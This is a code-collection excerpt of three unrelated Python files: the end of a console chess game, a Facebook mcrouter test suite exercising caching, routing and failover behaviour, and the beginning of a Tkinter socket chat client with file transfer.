pieces.no_moves()
self.auto_move = False
def one_player_func(self):
pieces.white_black_occupation()
pieces.calc_legal_moves()
pieces.check_checks()
if len(pieces.legal_moves) > 0:
if self.your_turn == True:
print(pieces.legal_moves)
while True:
print("Choose a move! (Copy the move exactly)")
move_choice = input()
if move_choice in pieces.legal_moves:
break
else:
print("That is not a valid move.")
else:
time.sleep(0)
pieces.convert_pieces_to_matrix()
move_choice = pieces.legal_moves[random.randint(0, len(pieces.legal_moves) - 1)]
self.your_turn = not self.your_turn
notation_val, take = pieces.convert_to_easy_notation(move_choice)
pieces.move_piece(notation_val, take)
half_move_limit, check_mate = pieces.half_move_check()
if half_move_limit == True and check_mate == False:
print("It's a draw by too many moves!")
self.one_player = False
self.white_turn = not self.white_turn
board.draw_board()
if self.playing_as_white == True:
pieces.draw_pieces_white()
else:
pieces.draw_pieces_black()
self.update = True
else:
pieces.no_moves()
self.one_player = False
def two_player_func(self):
pieces.white_black_occupation()
pieces.calc_legal_moves()
pieces.check_checks()
if len(pieces.legal_moves) > 0:
print(pieces.legal_moves)
while True:
print("Choose a move! (Copy the move exactly)")
move_choice = input()
if move_choice in pieces.legal_moves:
break
else:
print("That is not a valid move.")
notation_val, take = pieces.convert_to_easy_notation(move_choice)
pieces.move_piece(notation_val, take)
half_move_limit, check_mate = pieces.half_move_check()
if half_move_limit == True and check_mate == False:
print("It's a draw by too many moves!")
self.two_player = False
self.white_turn = not self.white_turn
board.draw_board()
if self.auto_rotate == True:
self.playing_as_white = self.white_turn
if self.playing_as_white == True:
pieces.draw_pieces_white()
else:
pieces.draw_pieces_black()
fen = notation.create_fen_position()
print(fen)
self.update = True
else:
pieces.no_moves()
self.two_player = False
startup = Start()
board = Board()
pieces = Pieces()
notation = Notation()
startup.start()
|
test_mcrouter_basic.py
|
# Copyright (c) 2017-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the LICENSE
# file in the root directory of this source tree.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from threading import Thread
import time
from mcrouter.test.MCProcess import McrouterClient, Memcached, Mcrouter
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestMcrouterBasicBase(McrouterTestCase):
config = './mcrouter/test/mcrouter_test_basic_1_1_1.json'
null_route_config = './mcrouter/test/test_nullroute.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc = self.add_server(self.make_memcached())
def get_mcrouter(self, additional_args=[]):
return self.add_mcrouter(
self.config, extra_args=self.extra_args + additional_args)
class TestMcrouterBasic(TestMcrouterBasicBase):
def test_basic_lease(self):
mcr = self.get_mcrouter()
result = mcr.leaseGet("testkey")
real_token = result["token"]
self.assertNotEqual(real_token, None)
result["value"] = "newvalue"
result["token"] = 42000
self.assertFalse(mcr.leaseSet("testkey", result))
result["token"] = real_token
self.assertTrue(mcr.leaseSet("testkey", result))
result2 = mcr.leaseGet("testkey")
self.assertEqual(result2["token"], None)
self.assertEqual(result2["value"], "newvalue")
# lease-get followed by a delete means the next lease-set will fail
result = mcr.leaseGet("newtestkey")
self.assertFalse(mcr.delete("newtestkey"))
self.assertFalse(mcr.leaseSet("newtestkey", result))
def test_invalid_key(self):
"""
Tests behavior when mcrouter routes keys which have prefixes that are
not in the config.
"""
mcr = self.get_mcrouter()
invalid_key = '/blah/bloh/key'
self.assertFalse(mcr.set(invalid_key, 'value'))
self.assertEqual(mcr.get(invalid_key), "SERVER_ERROR local error")
def test_stats(self):
mcr = self.get_mcrouter(['--proxy-threads=8'])
# Stats without args
res = mcr.issue_command_and_read_all('stats\r\n')
self.assertIsNotNone(res)
res = mcr.issue_command_and_read_all('stats \r\n')
self.assertIsNotNone(res)
res = mcr.issue_command_and_read_all('stats\n')
self.assertIsNotNone(res)
res = mcr.issue_command_and_read_all('stats \n')
self.assertIsNotNone(res)
# Stats with args
args = ['detailed', 'cmd-error', 'servers', 'suspect_servers', 'count']
for arg in args:
res = mcr.issue_command_and_read_all('stats{0}\r\n'.format(arg))
self.assertTrue('CLIENT_ERROR' in res)
res = mcr.issue_command_and_read_all('stats {0}\r\n'.format(arg))
self.assertTrue('END' in res)
res = mcr.issue_command_and_read_all('stats {0} \r\n'.format(arg))
self.assertTrue('END' in res)
res = mcr.issue_command_and_read_all('stats{0}\n'.format(arg))
self.assertTrue('CLIENT_ERROR' in res)
res = mcr.issue_command_and_read_all('stats {0}\n'.format(arg))
self.assertTrue('END' in res)
res = mcr.issue_command_and_read_all('stats {0} \n'.format(arg))
self.assertTrue('END' in res)
# Stats with invalid arg
res = mcr.issue_command_and_read_all('stats invalid_option\r\n')
self.assertTrue('CLIENT_ERROR' in res)
def test_stats_deadlock(self):
mcr = self.get_mcrouter(['--proxy-threads=8'])
def run_client(fail, port):
mc = McrouterClient(port)
mc.connect()
for i in range(1000):
s = mc.stats()
if not s:
fail[0] = True
return
f = [False]
ts = [Thread(target=run_client, args=(f, mcr.port)) for i in range(8)]
[t.start() for t in ts]
[t.join() for t in ts]
self.assertFalse(f[0])
def test_basic_cas(self):
mcr = self.get_mcrouter()
self.assertIsNone(mcr.cas('key', 'value', 1))
self.assertIsNone(mcr.gets('key'))
self.assertTrue(mcr.add('key', 'value'))
ret = mcr.gets('key')
self.assertIsNotNone(ret)
old_cas = ret['cas']
self.assertEqual(ret['value'], 'value')
self.assertTrue(mcr.cas('key', 'value2', ret["cas"]))
ret = mcr.gets('key')
self.assertEqual(ret['value'], 'value2')
self.assertNotEqual(old_cas, ret['cas'])
self.assertTrue(mcr.set('key', 'value2'))
self.assertFalse(mcr.cas('key', 'value3', ret['cas']))
self.assertEqual(mcr.gets('key')['value'], 'value2')
def test_shutdown(self):
mcr = self.get_mcrouter()
mcr.shutdown()
time.sleep(2)
self.assertFalse(mcr.is_alive())
def test_double_bind(self):
mcr1 = self.get_mcrouter()
time.sleep(1)
mcr2 = Mcrouter(self.null_route_config, port=mcr1.port)
time.sleep(2)
self.assertTrue(mcr1.is_alive())
self.assertFalse(mcr2.is_alive())
def test_set_exptime(self):
mcr = self.get_mcrouter()
# positive
self.assertTrue(mcr.set('key', 'value', exptime=10))
self.assertEqual(mcr.get('key'), 'value')
# negative
self.assertTrue(mcr.set('key', 'value', exptime=-10))
self.assertIsNone(mcr.get('key'))
# future: year 2033
self.assertTrue(mcr.set('key', 'value', exptime=2000000000))
self.assertEqual(mcr.get('key'), 'value')
# past
self.assertTrue(mcr.set('key', 'value', exptime=1432250000))
# items with past time may a second or two longer
time.sleep(2)
self.assertIsNone(mcr.get('key'))
class TestMcrouterBasicTouch(TestMcrouterBasicBase):
def __init__(self, *args, **kwargs):
super(TestMcrouterBasicTouch, self).__init__(*args, **kwargs)
self.use_mock_mc = True
def test_basic_touch(self):
mcr = self.get_mcrouter()
# positive
self.assertTrue(mcr.set('key', 'value', exptime=0))
self.assertEqual(mcr.get('key'), 'value')
self.assertEqual(mcr.touch('key', 20), "TOUCHED")
self.assertEqual(mcr.get('key'), 'value')
# negative
self.assertEqual(mcr.touch('fake_key', 20), "NOT_FOUND")
self.assertIsNone(mcr.get('fake_key'))
# negative exptime
self.assertTrue(mcr.set('key1', 'value', exptime=10))
self.assertEqual(mcr.get('key1'), 'value')
self.assertEqual(mcr.touch('key1', -20), "TOUCHED")
self.assertIsNone(mcr.get('key1'))
# past
self.assertTrue(mcr.set('key2', 'value', exptime=10))
self.assertEqual(mcr.get('key'), 'value')
self.assertEqual(mcr.touch('key', 1432250000), "TOUCHED")
self.assertIsNone(mcr.get('key'))
class TestMcrouterInvalidRouteBase(McrouterTestCase):
config = './mcrouter/test/mcrouter_test_basic_1_1_1.json'
extra_args = ['--send-invalid-route-to-default']
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc = self.add_server(self.make_memcached())
def get_mcrouter(self, additional_args=[]):
return self.add_mcrouter(
self.config, extra_args=self.extra_args + additional_args)
class TestMcrouterInvalidRoute(TestMcrouterInvalidRouteBase):
def test_basic_invalid_route(self):
mcr = self.get_mcrouter()
self.assertTrue(mcr.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
self.assertTrue(mcr.set("/././key", "value2"))
self.assertEqual(mcr.get("/././key"), "value2")
self.assertEqual(mcr.get("/f/f/key"), "value2")
self.assertEqual(mcr.get("/test/test/key"), "value2")
self.assertEqual(mcr.get("key"), "value2")
self.assertTrue(mcr.set("/a/a/key", "value3"))
self.assertEqual(mcr.get("/a/a/key"), "value3")
self.assertEqual(mcr.get("key"), "value3")
self.assertTrue(mcr.set("/*/a/key", "value4"))
self.assertEqual(mcr.get("/a/a/key"), "value4")
self.assertEqual(mcr.get("key"), "value4")
self.assertTrue(mcr.set("/*/*/key", "value4"))
self.assertEqual(mcr.get("/a/a/key"), "value4")
self.assertEqual(mcr.get("key"), "value4")
class TestMcrouterInvalidRouteAppendPrepend(TestMcrouterInvalidRouteBase):
def __init__(self, *args, **kwargs):
super(TestMcrouterInvalidRouteAppendPrepend, self).__init__(
*args, **kwargs)
self.use_mock_mc = True
def test_basic_invalid_route(self):
mcr = self.get_mcrouter()
self.assertTrue(mcr.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
self.assertEqual(mcr.append("/*/*/key", "abc"), "STORED")
self.assertEqual(mcr.get("/a/a/key"), "valueabc")
self.assertEqual(mcr.get("key"), "valueabc")
self.assertEqual(mcr.prepend("/*/*/key", "123"), "STORED")
self.assertEqual(mcr.get("/a/a/key"), "123valueabc")
self.assertEqual(mcr.get("key"), "123valueabc")
class TestMcrouterBasic2(McrouterTestCase):
config = './mcrouter/test/mcrouter_test_basic_2_1_1.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
def get_mcrouter(self, additional_args=[]):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args + additional_args)
def test_prefix_routing(self):
mcr = self.get_mcrouter()
# first test default routing prefix
self.mc1.set("cluster1_key", "cluster1")
self.assertEqual(mcr.get("cluster1_key"), "cluster1")
# next set to a remote cluster
mcr.set("/b/b/cluster2_key_router", "cluster2_router")
self.assertEqual(self.mc2.get("cluster2_key_router"), "cluster2_router")
# try fetching a value from a remote cluster
self.mc2.set("cluster2_key", "cluster2")
self.assertEqual(self.mc2.get("cluster2_key"), "cluster2")
self.assertEqual(mcr.get("/b/b/cluster2_key"), "cluster2")
def test_delete(self):
mcr = self.get_mcrouter()
mcr.set('foobarbizbang', 'some_value')
self.assertTrue(mcr.delete('foobarbizbang'))
self.assertFalse(mcr.delete('foobarbizbang2'))
self.assertTrue(mcr.set('hello', 'world'))
self.assertEqual(mcr.get('hello'), 'world')
def test_malformed_umbrella_length(self):
mcr = self.get_mcrouter()
# Send an umbrella request with a malformed length, and check that we
# get something back from the server (i.e. that it doesn't crash)
mcr.socket.settimeout(10)
mcr.socket.send('}}\x00\x01\x00\x00\x00\x00')
data = mcr.socket.recv(1024)
self.assertTrue(data)
# else hang
def test_use_big_value(self):
mcr = self.get_mcrouter(['--big-value-split-threshold=100'])
reply = mcr.get('__mcrouter__.route_handles(get,test)')
self.assertEqual(reply.count('big-value'), 1)
def test_no_big_value(self):
mcr = self.get_mcrouter()
reply = mcr.get('__mcrouter__.route_handles(get,test)')
self.assertNotIn('big-value', reply)
def test_enable_logging_route(self):
mcr = self.get_mcrouter(['--enable-logging-route'])
reply = mcr.get('__mcrouter__.route_handles(get,test)')
self.assertEqual(reply.count('logging'), 1)
def test_no_logging_route(self):
mcr = self.get_mcrouter()
reply = mcr.get('__mcrouter__.route_handles(get,test)')
self.assertNotIn('logging', reply)
class TestBasicAllSyncBase(McrouterTestCase):
config = './mcrouter/test/test_basic_all_sync.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(self.make_memcached())
self.mc2 = self.add_server(self.make_memcached())
self.mc3 = self.add_server(self.make_memcached())
class TestBasicAllSync(TestBasicAllSyncBase):
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_basic_all_sync(self):
"""
Tests that the responses are being aggregated and the most awful
(based on the awfulness map) is begin returned
"""
mcr = self.get_mcrouter()
# set key in three cluster
self.mc1.set("key", "value")
self.mc2.set("key", "value")
self.mc3.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
# delete will return True on DELETED
# will return False on NOT_FOUND
# perform a delete and check the response
# the aggregated response should be DELETED
self.assertTrue(mcr.delete("key"))
# set key in only one cluster
self.mc1.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
# the aggregated response should be NOT_FOUND
self.assertFalse(mcr.delete("key"))
class TestBasicAllSyncAppendPrependTouch(TestBasicAllSyncBase):
def __init__(self, *args, **kwargs):
super(TestBasicAllSyncAppendPrependTouch, self).__init__(
*args, **kwargs)
self.use_mock_mc = True
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_append_prepend_all_sync(self):
"""
Tests that append and prepend work with AllSync. We rely on these
tests to verify correctness of append/prepend since we don't use
these commands in production.
"""
mcr = self.get_mcrouter()
mcr.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
self.assertEqual(mcr.append("key", "abc"), "STORED")
self.assertEqual(mcr.prepend("key", "123"), "STORED")
self.assertEqual(self.mc1.get("key"), "123valueabc")
self.assertEqual(self.mc2.get("key"), "123valueabc")
self.assertEqual(self.mc3.get("key"), "123valueabc")
self.assertEqual(mcr.get("key"), "123valueabc")
self.mc1.set("key2", "value")
self.assertEqual(self.mc1.get("key2"), "value")
self.assertEqual(self.mc1.append("key2", "xyz"), "STORED")
self.assertEqual(self.mc1.get("key2"), "valuexyz")
self.assertFalse(mcr.get("key2"))
self.mc1.set("key3", "value")
self.assertEqual(self.mc1.get("key3"), "value")
self.assertEqual(self.mc1.prepend("key3", "xyz"), "STORED")
self.assertEqual(self.mc1.get("key3"), "xyzvalue")
self.assertFalse(mcr.get("key3"))
def test_touch_all_sync(self):
mcr = self.get_mcrouter()
mcr.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
self.assertEqual(mcr.touch("key", 3600), "TOUCHED")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
self.mc1.set("key2", "value")
self.assertEqual(self.mc1.get("key2"), "value")
self.assertEqual(self.mc1.touch("key2", 3600), "TOUCHED")
self.assertEqual(self.mc1.get("key2"), "value")
self.assertFalse(mcr.get("key2"))
mcr.set("key3", "value")
self.assertEqual(self.mc1.get("key3"), "value")
self.assertEqual(self.mc1.touch("key3", -10), "TOUCHED")
self.assertEqual(self.mc2.get("key3"), "value")
self.assertEqual(self.mc3.get("key3"), "value")
self.assertFalse(mcr.get("key3"))
class TestBasicAllFirst(McrouterTestCase):
config = './mcrouter/test/test_basic_all_first.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
self.mc3 = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_basic_all_first(self):
"""
Tests that the first non-tko response is returned
"""
mcr = self.get_mcrouter()
self.mc1.terminate()
self.assertTrue(mcr.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
class TestBasicAllMajority(McrouterTestCase):
config = './mcrouter/test/test_basic_all_majority.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
self.mc3 = self.add_server(Memcached())
self.mc4 = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_basic_all_majority(self):
"""
Tests that the majority response (ties broken by awfulness) is being
returned
"""
mcr = self.get_mcrouter()
# set key in four cluster
self.mc1.set("key", "value")
self.mc2.set("key", "value")
self.mc3.set("key", "value")
self.mc4.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
self.assertEqual(self.mc4.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
# perform a delete and check the response
# the majority response should be DELETED
self.assertTrue(mcr.delete("key"))
# make sure all deletes complete (otherwise they can race
# with the sets below)
time.sleep(1)
# set key in three clusters
self.assertTrue(self.mc1.set("key", "value"))
self.assertTrue(self.mc2.set("key", "value"))
self.assertTrue(self.mc3.set("key", "value"))
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
self.assertEqual(self.mc3.get("key"), "value")
# the majority response should be DELETED
self.assertTrue(mcr.delete("key"))
# make sure all deletes complete (otherwise they can race
# with the sets below)
time.sleep(1)
# set key in only one clusters
self.mc1.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
# the majority response should be NOT_FOUND
self.assertFalse(mcr.delete("key"))
# make sure all deletes complete (otherwise they can race
# with the sets below)
time.sleep(1)
# set key in two out of four clusters
self.mc1.set("key", "value")
self.mc2.set("key", "value")
self.assertEqual(self.mc1.get("key"), "value")
self.assertEqual(self.mc2.get("key"), "value")
# the majority response should be NOT_FOUND
# since it is sorted by awfulness map
self.assertFalse(mcr.delete("key"))
class TestBasicFailover(McrouterTestCase):
config = './mcrouter/test/test_basic_failover.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_failover(self):
"""
Tests that the failover path works.
"""
# default path is mctestc01
mcr = self.get_mcrouter()
# Go through the default route and verify a get.
self.assertTrue(self.mc1.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
self.mc1.terminate()
# Go through the failover now.
# We assert twice since in the first call mcrouter will discover
# a tko host and it short circuits the second time.
self.assertEqual(mcr.get("key"), None)
self.assertEqual(mcr.get("key"), None)
# Set in the failover and check.
self.assertTrue(self.mc2.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
self.assertEqual(mcr.get("key"), "value")
def test_failover_negative_exptime(self):
mcr = self.get_mcrouter()
# Go through the default route and verify a get.
self.assertTrue(mcr.set("key", "value", exptime=0))
self.assertEqual(mcr.get("key"), "value")
# Exptime using negative value: past
self.assertTrue(mcr.set("key", "value", exptime=-10))
self.assertIsNone(mcr.get("key"))
self.mc1.terminate()
# Go through the failover now.
# We assert twice since in the first call mcrouter will discover
# a tko host and it short circuits the second time.
self.assertEqual(mcr.get("key"), None)
self.assertEqual(mcr.get("key"), None)
# Check get failover still works
self.assertTrue(self.mc2.set("key", "value"))
self.assertEqual(mcr.get("key"), "value")
# Exptime using negative value: past
self.assertTrue(mcr.set("key", "value", exptime=-10))
self.assertIsNone(mcr.get("key"))
class TestBasicFailoverOverride(McrouterTestCase):
config = './mcrouter/test/test_basic_failover_override.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_failover_override(self):
"""
Tests that the failover overrides work.
"""
mcr = self.get_mcrouter()
# See that failovers are disabled for cluster1
self.mc1.terminate()
self.assertEqual(mcr.set("key1", "value1"), None)
self.assertEqual(mcr.get("key1"), None)
self.assertEqual(mcr.get("key1"), None)
# Check get failover still works
self.assertTrue(self.mc2.set("key2", "value2"))
self.assertEqual(mcr.get("key2"), "value2")
self.assertEqual(mcr.get("key2"), "value2")
class TestBasicFailoverLeastFailures(McrouterTestCase):
"""
The main purpose of this test is to make sure LeastFailures policy
is parsed correctly from json config. We rely on cpp tests to stress
correctness of LeastFailures failover policy.
"""
config = './mcrouter/test/test_basic_failover_least_failures.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.mc1 = self.add_server(Memcached())
self.mc2 = self.add_server(Memcached())
self.mc3 = self.add_server(Memcached())
self.mc4 = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_failover_least_failures(self):
mcr = self.get_mcrouter()
self.assertTrue(self.mc4.set("key", "value"))
self.mc1.terminate()
self.mc2.terminate()
self.mc3.terminate()
# Main child #1 fails, as do 2 and 3. No request to 4 since
# max_tries = 3
self.assertEqual(mcr.get("key"), None)
# Now 4 has least errors.
self.assertEqual(mcr.get("key"), "value")
class TestMcrouterBasicL1L2(McrouterTestCase):
config = './mcrouter/test/test_basic_l1_l2.json'
config_ncache = './mcrouter/test/test_basic_l1_l2_ncache.json'
extra_args = []
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.l1 = self.add_server(Memcached())
self.l2 = self.add_server(Memcached())
def get_mcrouter(self, config):
return self.add_mcrouter(config, extra_args=self.extra_args)
def test_l1_l2_get(self):
"""
Tests that gets using l1/l2 caching and result upgrading is working
"""
mcr = self.get_mcrouter(self.config)
# get a non-existent key
self.assertFalse(mcr.get("key1"))
# set keys in only l1 pool
self.l1.set("key1", "value1")
self.assertEqual(self.l1.get("key1"), "value1")
# perform a get and check the response
self.assertTrue(mcr.get("key1"), "value1")
# set key only in l2 pool
self.l2.set("key2", "value2")
self.assertEqual(self.l2.get("key2"), "value2")
self.assertEqual(self.l1.get("key2"), None)
# perform a get and check the response
self.assertEqual(mcr.get("key2"), "value2")
# perform the same get until it gets upgraded to l1
# if the test gets stuck in an infinite loop here upgrading results is
# not working
while self.l1.get("key2") != "value2":
self.assertEqual(mcr.get("key2"), "value2")
def test_l1_l2_get_l1_down(self):
"""
Tests that gets using l1/l2 caching is working when l1 is down
"""
mcr = self.get_mcrouter(self.config)
# set key in l1 and l2 pools
self.l1.set("key1", "value1")
self.l2.set("key1", "value1")
self.assertEqual(self.l1.get("key1"), "value1")
self.assertEqual(self.l2.get("key1"), "value1")
# terminate the l1 pool
self.l1.terminate()
# we should still be able to get from l2
self.assertEqual(mcr.get("key1"), "value1")
def test_l1_l2_get_l2_down(self):
"""
Tests that gets using l1/l2 caching is working when l2 is down
"""
mcr = self.get_mcrouter(self.config)
# set key in l1 and l2 pools
self.l1.set("key1", "value1")
self.l2.set("key1", "value1")
self.assertEqual(self.l1.get("key1"), "value1")
self.assertEqual(self.l2.get("key1"), "value1")
# terminate the l2 regional pool
self.l2.terminate()
# we should still be able to get from l1
self.assertTrue(mcr.get("key1"), "value1")
# terminate l1 pool as well
self.l1.terminate()
# we should get nothing back
self.assertFalse(mcr.get("key1"))
def test_l1_l2_get_ncache(self):
mcr = self.get_mcrouter(self.config_ncache)
# get a non-existent key
self.assertFalse(mcr.get("key1"))
time.sleep(1)
self.assertEqual(self.l1.get("key1"), "ncache")
self.assertTrue(self.l2.set("key1", "value1"))
self.assertFalse(mcr.get("key1"))
self.assertFalse(mcr.get("key1"))
self.assertFalse(mcr.get("key1"))
self.assertFalse(mcr.get("key1"))
self.assertFalse(mcr.get("key1"))
time.sleep(1)
self.assertEqual(mcr.get("key1"), "value1")
self.assertEqual(self.l1.get("key1"), "value1")
class TestMcrouterBasicL1L2SizeSplit(McrouterTestCase):
config = './mcrouter/test/test_basic_l1_l2_sizesplit.json'
config_bothset = './mcrouter/test/test_basic_l1_l2_sizesplit_bothset.json'
extra_args = []
MC_MSG_FLAG_SIZE_SPLIT = 0x20
def setUp(self):
# The order here corresponds to the order of hosts in the .json
self.l1 = self.add_server(Memcached())
self.l2 = self.add_server(Memcached())
def get_mcrouter(self, config):
return self.add_mcrouter(config, extra_args=self.extra_args)
def test_l1_l2_sizesplit_get(self):
"""
Basic functionality tests. Sets go to the right place, gets route properly
"""
mcr = self.get_mcrouter(self.config)
# get a non-existent key
self.assertFalse(mcr.get("key1"))
# set small key
mcr.set("key1", "value1")
# small key should be normal value in L1
self.assertEqual(self.l1.get("key1"), "value1")
# small key shouldn't be in L2
self.assertFalse(self.l2.get("key1"))
# perform a get and check the response
self.assertEqual(mcr.get("key1"), "value1")
# key should end up split
value2 = "foo" * 200
mcr.set("key2", value2)
# response should be zero bytes and have the flag
l1res = self.l1.get("key2", return_all_info=True)
self.assertEqual(l1res["value"], "")
self.assertTrue(l1res["flags"] & self.MC_MSG_FLAG_SIZE_SPLIT)
self.assertNotEqual(self.l1.get("key2"), "value1")
# full value on L2
self.assertEqual(self.l2.get("key2"), value2)
# get should run the internal redirect, give us L2 value
self.assertEqual(mcr.get("key2"), value2)
self.assertNotEqual(mcr.get("key2"), "")
def test_l1_l2_sizesplit_bothget(self):
"""
Basic functionality. Allow full setst to both pools.
"""
mcr = self.get_mcrouter(self.config_bothset)
self.assertFalse(mcr.get("key1"))
# small key should only exist in L1
mcr.set("key1", "value1")
# small key should be normal value in L1
self.assertEqual(self.l1.get("key1"), "value1")
# small key shouldn't be in L2
self.assertFalse(self.l2.get("key1"), "value1")
# perform a get and check the response
self.assertEqual(mcr.get("key1"), "value1")
# key should end up split. end up in both pools.
value2 = "foo" * 200
mcr.set("key2", value2)
# The write to L2 is async and we're checking it right away.
time.sleep(1)
self.assertEqual(self.l1.get("key2"), value2)
self.assertEqual(self.l2.get("key2"), value2)
self.assertEqual(mcr.get("key2"), value2)
def test_l1_l2_get_l2_down(self):
"""
If L2 is down, do we get expected errors.
"""
mcr = self.get_mcrouter(self.config)
value = "foob" * 200
mcr.set("key", value)
self.l2.terminate()
self.assertEqual(self.l1.get("key"), "")
self.assertFalse(mcr.get("key"))
class TestMcrouterPortOverride(McrouterTestCase):
config = './mcrouter/test/mcrouter_test_portoverride.json'
def test_portoverride(self):
mc = self.add_server(Memcached())
self.port_map = {}
extra_args = ['--config-params', 'PORT:{}'.format(mc.getport())]
mcr = self.add_mcrouter(self.config, extra_args=extra_args)
self.assertTrue(mcr.set('key', 'value'))
self.assertEqual(mcr.get('key'), 'value')
|
myclient.py
|
#!/usr/bin/env python3
"""Script for Tkinter GUI chat client."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import tkinter
from tkinter import filedialog, Tk
import os
import time
def recv_file():
print("file request from ")
fname = client_socket.recv(BUFSIZ).decode("utf8")
print ("recieving file " + fname )
fsize = client_socket.recv(BUFSIZ)
fsize = int(fsize)
data_len = 0
print("fsize: {}".format(fsize))
local_file = "../received_files/" + fname
with open(local_file, 'wb') as f:
print ('opened file')
while data_len<fsize:
data = client_socket.recv(BUFSIZ)
if not data:
break
data_len += len(data)
f.write(data)
print("Done writing file at client")
return fname, fsize
def private_recv_file(pclient_socket):
print("file request from ")
fname = pclient_socket.recv(BUFSIZ).decode("utf8")
print ("recieving file " + fname )
fsize = pclient_socket.recv(BUFSIZ)
fsize = int(fsize)
data_len = 0
print("fsize: {}".format(fsize))
local_file = "../received_files/" + fname
with open(local_file, 'wb') as f:
print ('opened file')
while data_len<fsize:
data = pclient_socket.recv(BUFSIZ)
if not data:
break
data_len += len(data)
f.write(data)
print("Done writing file at client")
return fname, fsize
def send_file():
fpath = filedialog.askopenfilename(initialdir = "/",title = "Select file")
fname = fpath.split('/')[-1]
fsize = os.path.getsize(fpath)
client_socket.send(bytes('{file}', "utf8"))
time.sleep(0.5)
client_socket.send(bytes(fname, "utf8"))
time.sleep(0.5)
client_socket.send(bytes(str(fsize), "utf8"))
time.sleep(0.5)
with open(fpath, 'rb') as f:
while True:
data = f.read(BUFSIZ)
if not data:
break
client_socket.sendall(data)
print("File sent to server")
time.sleep(0.5)
def private_send_file(pclient_socket):
fpath = filedialog.askopenfilename(initialdir = "/",title = "Select file")
fname = fpath.split('/')[-1]
fsize = os.path.getsize(fpath)
pclient_socket.send(bytes('{file}', "utf8"))
time.sleep(0.5)
pclient_socket.send(bytes(fname, "utf8"))
time.sleep(0.5)
pclient_socket.send(bytes(str(fsize), "utf8"))
time.sleep(0.5)
with open(fpath, 'rb') as f:
while True:
data = f.read(BUFSIZ)
if not data:
break
pclient_socket.sendall(data)
print("File sent to server")
time.sleep(0.5)
def private_receive(pmsg_list, pclient_socket):
"""Handles receiving of messages."""
# pmsg_list = ptop.messages_frame.msg_list
while True:
try:
msg = pclient_socket.recv(BUFSIZ)
if msg == bytes("{file}", "utf8"):
pmsg_list.insert(tkinter.END, "Receiving File")
fname, fsize = private_recv_file(pclient_socket)
pmsg_list.insert(tkinter.END, "File Recieved")
elif msg == bytes("{quit}", "utf8"):
break
else:
msg = msg.decode('utf8')
pmsg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
def receive():
"""Handles receiving of messages."""
buttons_frame = tkinter.Frame(top)
while True:
try:
msg = client_socket.recv(BUFSIZ).decode("utf8")
# print(msg)
if msg == '{quit}':
break
elif '{prequest}' in msg[0:12]:
name = msg[11:]
handle_connection_request(name)
elif '{name}' in msg[0:6]:
print(msg)
uname.insert(tkinter.END, msg[7:])
elif '{namelist}' in msg[0:12]:
nlist = msg.split('_')[1]
name_list = nlist.split(',')[1:]
print(name_list)
buttons_frame.destroy()
buttons_frame = tkinter.Frame(top)
for name in name_list:
private_button = tkinter.Button(buttons_frame, text=name, command=lambda user=name: create_private(user))
private_button.pack(side=tkinter.LEFT)
buttons_frame.pack(side=tkinter.LEFT)
else:
msg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
